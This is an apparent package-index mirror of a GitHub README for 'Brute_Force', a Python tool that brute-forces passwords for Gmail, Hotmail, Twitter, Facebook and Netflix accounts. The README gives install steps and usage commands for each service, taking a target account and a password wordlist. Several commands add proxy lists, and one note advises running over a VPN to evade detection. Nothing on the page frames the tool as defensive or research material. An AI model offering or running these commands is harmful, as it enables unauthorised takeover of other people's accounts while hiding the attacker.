https://github.com/matrix07ksa/brute_force
Brute_Force_Attack Gmail Hotmail Twitter Facebook Netflix
https://github.com/matrix07ksa/brute_force
Last synced: about 1 year ago
JSON representation
Brute_Force_Attack Gmail Hotmail Twitter Facebook Netflix
- Host: GitHub
- URL: https://github.com/matrix07ksa/brute_force
- Owner: Matrix07ksa
- License: gpl-3.0
- Created: 2019-07-12T08:22:45.000Z (almost 7 years ago)
- Default Branch: master
- Last Pushed: 2021-10-08T07:22:10.000Z (over 4 years ago)
- Last Synced: 2025-04-01T19:19:40.420Z (over 1 year ago)
- Language: Python
- Homepage:
- Size: 85.9 KB
- Stars: 1,550
- Watchers: 103
- Forks: 248
- Open Issues: 44
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
README
# Brute_Force
[](http://www.python.org/download/)
[](https://www.gnu.org/licenses/gpl-3.0.html)
[](https://termux.com/)




## install :
```bash
sudo apt install python3 python3-pip
pip3 install proxylist
pip3 install mechanize
```
# Usage:
## BruteForce Gmail Attack
```bash
python3 Brute_Force.py -g Account@gmail.com -l File_list
python3 Brute_Force.py -g Account@gmail.com -p Password_Single
```
## BruteForce Hotmail Attack
```bash
python3 Brute_Force.py -t Account@hotmail.com -l File_list
python3 Brute_Force.py -t Account@hotmail.com -p Password_Single
```
## BruteForce Twitter Attack
```bash
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt
```
## BruteForce Facebook Attack
```bash
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt
```
## BruteForce Netflix Attack
```bash
يفضل تشغيل VPN
Start On Vpn
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt
وترقبووو المزيد
```